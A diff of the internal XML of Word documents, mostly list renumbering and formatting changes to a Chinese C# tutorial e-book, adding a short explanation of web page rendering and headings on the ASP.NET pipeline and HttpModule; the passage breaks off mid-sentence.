@@ -56788,7 +58250,7 @@
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="91">
-    <w:abstractNumId w:val="48"/>
+    <w:abstractNumId w:val="50"/>
     <w:lvlOverride w:ilvl="0">
       <w:startOverride w:val="1"/>
     </w:lvlOverride>
@@ -56818,10 +58280,10 @@
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="92">
-    <w:abstractNumId w:val="39"/>
+    <w:abstractNumId w:val="40"/>
   </w:num>
   <w:num w:numId="93">
-    <w:abstractNumId w:val="39"/>
+    <w:abstractNumId w:val="40"/>
     <w:lvlOverride w:ilvl="0">
       <w:startOverride w:val="1"/>
     </w:lvlOverride>
@@ -56851,7 +58313,7 @@
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="94">
-    <w:abstractNumId w:val="39"/>
+    <w:abstractNumId w:val="40"/>
     <w:lvlOverride w:ilvl="0">
       <w:startOverride w:val="1"/>
     </w:lvlOverride>
@@ -57346,10 +58808,10 @@
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="115">
-    <w:abstractNumId w:val="46"/>
+    <w:abstractNumId w:val="47"/>
   </w:num>
   <w:num w:numId="116">
-    <w:abstractNumId w:val="46"/>
+    <w:abstractNumId w:val="47"/>
     <w:lvlOverride w:ilvl="0">
       <w:startOverride w:val="1"/>
     </w:lvlOverride>
@@ -57379,7 +58841,7 @@
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="117">
-    <w:abstractNumId w:val="46"/>
+    <w:abstractNumId w:val="47"/>
     <w:lvlOverride w:ilvl="0">
       <w:startOverride w:val="1"/>
     </w:lvlOverride>
@@ -57409,7 +58871,7 @@
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="118">
-    <w:abstractNumId w:val="46"/>
+    <w:abstractNumId w:val="47"/>
     <w:lvlOverride w:ilvl="0">
       <w:startOverride w:val="1"/>
     </w:lvlOverride>
@@ -57439,7 +58901,7 @@
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="119">
-    <w:abstractNumId w:val="46"/>
+    <w:abstractNumId w:val="47"/>
     <w:lvlOverride w:ilvl="0">
       <w:startOverride w:val="1"/>
     </w:lvlOverride>
@@ -57469,7 +58931,7 @@
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="120">
-    <w:abstractNumId w:val="46"/>
+    <w:abstractNumId w:val="47"/>
     <w:lvlOverride w:ilvl="0">
       <w:startOverride w:val="1"/>
     </w:lvlOverride>
@@ -57499,7 +58961,7 @@
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="121">
-    <w:abstractNumId w:val="46"/>
+    <w:abstractNumId w:val="47"/>
     <w:lvlOverride w:ilvl="0">
       <w:startOverride w:val="1"/>
     </w:lvlOverride>
@@ -57529,7 +58991,7 @@
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="122">
-    <w:abstractNumId w:val="46"/>
+    <w:abstractNumId w:val="47"/>
     <w:lvlOverride w:ilvl="0">
       <w:startOverride w:val="1"/>
     </w:lvlOverride>
@@ -57559,7 +59021,7 @@
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="123">
-    <w:abstractNumId w:val="46"/>
+    <w:abstractNumId w:val="47"/>
     <w:lvlOverride w:ilvl="0">
       <w:startOverride w:val="1"/>
     </w:lvlOverride>
@@ -57589,7 +59051,7 @@
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="124">
-    <w:abstractNumId w:val="46"/>
+    <w:abstractNumId w:val="47"/>
     <w:lvlOverride w:ilvl="0">
       <w:startOverride w:val="1"/>
     </w:lvlOverride>
@@ -57619,10 +59081,10 @@
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="125">
-    <w:abstractNumId w:val="40"/>
+    <w:abstractNumId w:val="41"/>
   </w:num>
   <w:num w:numId="126">
-    <w:abstractNumId w:val="40"/>
+    <w:abstractNumId w:val="41"/>
     <w:lvlOverride w:ilvl="0">
       <w:startOverride w:val="1"/>
     </w:lvlOverride>
@@ -57652,7 +59114,7 @@
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="127">
-    <w:abstractNumId w:val="40"/>
+    <w:abstractNumId w:val="41"/>
     <w:lvlOverride w:ilvl="0">
       <w:startOverride w:val="1"/>
     </w:lvlOverride>
@@ -57682,7 +59144,7 @@
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="128">
-    <w:abstractNumId w:val="40"/>
+    <w:abstractNumId w:val="41"/>
     <w:lvlOverride w:ilvl="0">
       <w:startOverride w:val="1"/>
     </w:lvlOverride>
@@ -57712,7 +59174,7 @@
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="129">
-    <w:abstractNumId w:val="40"/>
+    <w:abstractNumId w:val="41"/>
     <w:lvlOverride w:ilvl="0">
       <w:startOverride w:val="1"/>
     </w:lvlOverride>
@@ -57742,7 +59204,7 @@
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="130">
-    <w:abstractNumId w:val="40"/>
+    <w:abstractNumId w:val="41"/>
     <w:lvlOverride w:ilvl="0">
       <w:startOverride w:val="1"/>
     </w:lvlOverride>
@@ -58054,10 +59516,10 @@
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="144">
-    <w:abstractNumId w:val="42"/>
+    <w:abstractNumId w:val="43"/>
   </w:num>
   <w:num w:numId="145">
-    <w:abstractNumId w:val="42"/>
+    <w:abstractNumId w:val="43"/>
     <w:lvlOverride w:ilvl="0">
       <w:startOverride w:val="1"/>
     </w:lvlOverride>
@@ -58396,28 +59858,28 @@
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="159">
-    <w:abstractNumId w:val="53"/>
+    <w:abstractNumId w:val="55"/>
   </w:num>
   <w:num w:numId="160">
-    <w:abstractNumId w:val="34"/>
+    <w:abstractNumId w:val="35"/>
   </w:num>
   <w:num w:numId="161">
-    <w:abstractNumId w:val="49"/>
+    <w:abstractNumId w:val="51"/>
   </w:num>
   <w:num w:numId="162">
-    <w:abstractNumId w:val="54"/>
+    <w:abstractNumId w:val="56"/>
   </w:num>
   <w:num w:numId="163">
-    <w:abstractNumId w:val="47"/>
+    <w:abstractNumId w:val="48"/>
   </w:num>
   <w:num w:numId="164">
+    <w:abstractNumId w:val="45"/>
+  </w:num>
+  <w:num w:numId="165">
     <w:abstractNumId w:val="44"/>
   </w:num>
-  <w:num w:numId="165">
-    <w:abstractNumId w:val="43"/>
-  </w:num>
   <w:num w:numId="166">
-    <w:abstractNumId w:val="45"/>
+    <w:abstractNumId w:val="46"/>
   </w:num>
   <w:num w:numId="167">
     <w:abstractNumId w:val="31"/>
@@ -58432,10 +59894,16 @@
     <w:abstractNumId w:val="25"/>
   </w:num>
   <w:num w:numId="171">
-    <w:abstractNumId w:val="52"/>
+    <w:abstractNumId w:val="54"/>
   </w:num>
   <w:num w:numId="172">
-    <w:abstractNumId w:val="51"/>
+    <w:abstractNumId w:val="53"/>
+  </w:num>
+  <w:num w:numId="173">
+    <w:abstractNumId w:val="49"/>
+  </w:num>
+  <w:num w:numId="174">
+    <w:abstractNumId w:val="34"/>
   </w:num>
   <w:numIdMacAtCleanup w:val="172"/>
 </w:numbering>
@@ -59315,7 +60783,7 @@
 </file>
 
 <file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{A4E00F47-166D-428A-A682-F5BB1E1A0B60}">
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{F2AAA371-468C-4CBD-A058-5113E20C4908}">
   <ds:schemaRefs>
     <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
   </ds:schemaRefs>

--- a/EBook/C#技术栈.docx
+++ b/EBook/C#技术栈.docx
@@ -1461,7 +1461,6 @@
           <w:sz w:val="24"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>sealed密封类</w:t>
       </w:r>
     </w:p>
@@ -1543,6 +1542,7 @@
           <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
           <w:sz w:val="24"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">       把一个基类方法声明为virtual，就可以在任何类的派生类中重写该方法。也可以将属性声明为virtual</w:t>
       </w:r>
     </w:p>
@@ -2327,6 +2327,94 @@
         <w:tabs>
           <w:tab w:val="left" w:pos="720"/>
         </w:tabs>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="720"/>
+        </w:tabs>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="720"/>
+        </w:tabs>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="720"/>
+        </w:tabs>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="720"/>
+        </w:tabs>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="720"/>
+        </w:tabs>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="720"/>
+        </w:tabs>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="720"/>
+        </w:tabs>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="720"/>
+        </w:tabs>
       </w:pPr>
     </w:p>
     <w:p>
@@ -2846,7 +2934,6 @@
           <w:szCs w:val="19"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>多播委托</w:t>
       </w:r>
       <w:r>
@@ -3167,6 +3254,7 @@
           <w:szCs w:val="31"/>
           <w:shd w:val="clear" w:color="auto" w:fill="399AB2"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>泛型</w:t>
       </w:r>
     </w:p>
@@ -3244,9 +3332,6 @@
           <w:numId w:val="6"/>
         </w:numPr>
         <w:ind w:left="450"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -3418,9 +3503,6 @@
           <w:numId w:val="6"/>
         </w:numPr>
         <w:ind w:left="450"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -3821,9 +3903,6 @@
           <w:numId w:val="6"/>
         </w:numPr>
         <w:ind w:left="450"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -4069,7 +4148,6 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>泛型方法：除了定义泛型类之外，还可以定义泛型方法，在方法声明中可以定义泛型类。泛型方法可以在非泛型类中定义。</w:t>
       </w:r>
     </w:p>
@@ -4663,6 +4741,7 @@
           <w:szCs w:val="20"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>Where()</w:t>
       </w:r>
       <w:r>
@@ -4773,7 +4852,7 @@
         </w:numPr>
         <w:ind w:left="450"/>
         <w:rPr>
-          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia" w:hint="eastAsia"/>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
           <w:szCs w:val="21"/>
         </w:rPr>
       </w:pPr>
@@ -4910,7 +4989,6 @@
         </w:numPr>
         <w:ind w:left="450"/>
         <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
           <w:szCs w:val="21"/>
         </w:rPr>
       </w:pPr>
@@ -4994,7 +5072,6 @@
           <w:color w:val="000000"/>
           <w:szCs w:val="21"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>OrderBy&lt;</w:t>
       </w:r>
       <w:r>
@@ -5055,7 +5132,7 @@
         </w:numPr>
         <w:ind w:left="450"/>
         <w:rPr>
-          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia" w:hint="eastAsia"/>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
           <w:szCs w:val="21"/>
         </w:rPr>
       </w:pPr>
@@ -5908,6 +5985,7 @@
           <w:rFonts w:hint="eastAsia"/>
           <w:sz w:val="24"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>常见的遍历文档的方法有</w:t>
       </w:r>
       <w:r>
@@ -6142,7 +6220,6 @@
           <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia" w:hint="eastAsia"/>
           <w:sz w:val="24"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>XPathNavigator也可以读写XML文档，特点是可以通过XPath语句访问到指定元素。要注意的是，只用通过XMLDocument创建的对象才可以修改文件，通过XMLPathDocument创建的对象是只读的。。</w:t>
       </w:r>
     </w:p>
@@ -6868,9 +6945,6 @@
           <w:numId w:val="9"/>
         </w:numPr>
         <w:ind w:left="450"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -7282,7 +7356,6 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>使用</w:t>
       </w:r>
       <w:r>
@@ -7359,6 +7432,7 @@
           <w:szCs w:val="31"/>
           <w:shd w:val="clear" w:color="auto" w:fill="399AB2"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>数据层</w:t>
       </w:r>
     </w:p>
@@ -8247,7 +8321,6 @@
           <w:szCs w:val="20"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>赋予</w:t>
       </w:r>
       <w:r>
@@ -8368,7 +8441,6 @@
         <w:ind w:left="900"/>
         <w:jc w:val="left"/>
         <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
@@ -8605,6 +8677,7 @@
           <w:szCs w:val="31"/>
           <w:shd w:val="clear" w:color="auto" w:fill="399AB2"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>异步和多线程</w:t>
       </w:r>
     </w:p>
@@ -8815,7 +8888,6 @@
         <w:spacing w:line="360" w:lineRule="auto"/>
         <w:ind w:left="1350"/>
         <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
           <w:sz w:val="24"/>
         </w:rPr>
       </w:pPr>
@@ -9088,7 +9160,6 @@
         <w:spacing w:line="360" w:lineRule="auto"/>
         <w:ind w:left="1350"/>
         <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
           <w:color w:val="00B050"/>
           <w:sz w:val="24"/>
         </w:rPr>
@@ -9100,7 +9171,6 @@
           <w:sz w:val="24"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>基于事件的异步方法优势在于易于使用。但是，在自定义类中这个模式就没有这么简单了。</w:t>
       </w:r>
     </w:p>
@@ -9530,6 +9600,7 @@
           <w:rFonts w:hint="eastAsia"/>
           <w:sz w:val="24"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>Task</w:t>
       </w:r>
       <w:r>
@@ -10028,7 +10099,6 @@
           <w:rFonts w:hint="eastAsia"/>
           <w:sz w:val="24"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>概念</w:t>
       </w:r>
       <w:r>
@@ -10527,7 +10597,14 @@
         <w:rPr>
           <w:sz w:val="24"/>
         </w:rPr>
-        <w:t>时，总是做出在当前看来是最好的选择。也就是说，不从整体最优上加以考虑，他所做出的是在某种意义上的局部</w:t>
+        <w:t>时，总是做出在当前看来是最好的选择。也就</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>是说，不从整体最优上加以考虑，他所做出的是在某种意义上的局部</w:t>
       </w:r>
       <w:hyperlink r:id="rId12" w:tgtFrame="https://baike.baidu.com/item/%E8%B4%AA%E5%BF%83%E7%AE%97%E6%B3%95/_blank" w:history="1">
         <w:r>
@@ -10815,7 +10892,6 @@
           <w:szCs w:val="31"/>
           <w:shd w:val="clear" w:color="auto" w:fill="399AB2"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>ASP.NET MVC</w:t>
       </w:r>
       <w:r>
@@ -10833,9 +10909,6 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="10"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -10913,17 +10986,11 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="10"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="10"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -10956,9 +11023,6 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="10"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -10982,7 +11046,6 @@
           <w:numId w:val="173"/>
         </w:numPr>
         <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
           <w:color w:val="0070C0"/>
         </w:rPr>
       </w:pPr>
@@ -11002,7 +11065,6 @@
           <w:numId w:val="173"/>
         </w:numPr>
         <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
           <w:color w:val="0070C0"/>
         </w:rPr>
       </w:pPr>
@@ -11022,7 +11084,6 @@
           <w:numId w:val="173"/>
         </w:numPr>
         <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
           <w:color w:val="0070C0"/>
         </w:rPr>
       </w:pPr>
@@ -11037,9 +11098,6 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="10"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -11075,9 +11133,6 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="10"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
     </w:p>
     <w:p>
@@ -11085,7 +11140,7 @@
         <w:pStyle w:val="10"/>
         <w:outlineLvl w:val="2"/>
         <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
           <w:b/>
           <w:color w:val="0070C0"/>
           <w:sz w:val="28"/>
@@ -11093,34 +11148,218 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
           <w:b/>
           <w:color w:val="0070C0"/>
           <w:sz w:val="28"/>
         </w:rPr>
-        <w:t>ASP.NET</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
+        <w:t>页面动态输出</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>Web</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>页面从服务器到浏览器的整个呈现过程实际上是分三步：第一步是通过视图引擎对视图文件进行解释，将视图文件中的代码转成</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>HTML</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>代码，这一步叫</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:b/>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+        <w:t>渲染</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>；</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>第二步是将渲染后的</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>HTML</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>标记传递给客户端浏览器，这一步是页面的</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:b/>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+        <w:t>传递</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>；</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>第三步是浏览器接收到</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>HTML</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>后对其进行处理并呈现为</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>Web</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>页面，这一步才叫</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:b/>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+        <w:t>呈现</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>。由此可见，渲染是把页面的非</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>HTML</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>代码转成</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>HTML</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>标记，这一步是由服务器完成的。而呈现是把</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>HTML</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>标记显示成</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>Web</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>页面，这一步工作是由浏览器完成的。渲染和呈现是整个页面处理过程两个不同的阶段，更不能把这两步工作混谈只有“呈现”。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:outlineLvl w:val="2"/>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
           <w:b/>
           <w:color w:val="0070C0"/>
           <w:sz w:val="28"/>
         </w:rPr>
-        <w:t>管道</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="10"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="174"/>
-        </w:numPr>
+      </w:pPr>
+      <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
           <w:b/>
           <w:color w:val="0070C0"/>
+          <w:sz w:val="28"/>
+        </w:rPr>
+        <w:t>ASP.NET管道</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="174"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
+          <w:b/>
+          <w:color w:val="0070C0"/>
           <w:szCs w:val="20"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
@@ -11141,7 +11380,6 @@
         <w:pStyle w:val="10"/>
         <w:ind w:left="90"/>
         <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
           <w:szCs w:val="20"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
@@ -11248,7 +11486,6 @@
         <w:pStyle w:val="10"/>
         <w:ind w:left="90"/>
         <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
           <w:szCs w:val="20"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
@@ -11261,6 +11498,15 @@
           <w:ilvl w:val="0"/>
           <w:numId w:val="174"/>
         </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
+          <w:b/>
+          <w:color w:val="0070C0"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
           <w:b/>
@@ -11268,6 +11514,284 @@
           <w:szCs w:val="20"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
+        <w:t>HttpModule</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:ind w:left="90"/>
+        <w:rPr>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>ASP.NET</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>拥有一个具有高度可拓展性的引擎，并且能够处理对于不同资源类型的请求。那么是什么成就了</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:color w:val="0070C0"/>
+          <w:szCs w:val="20"/>
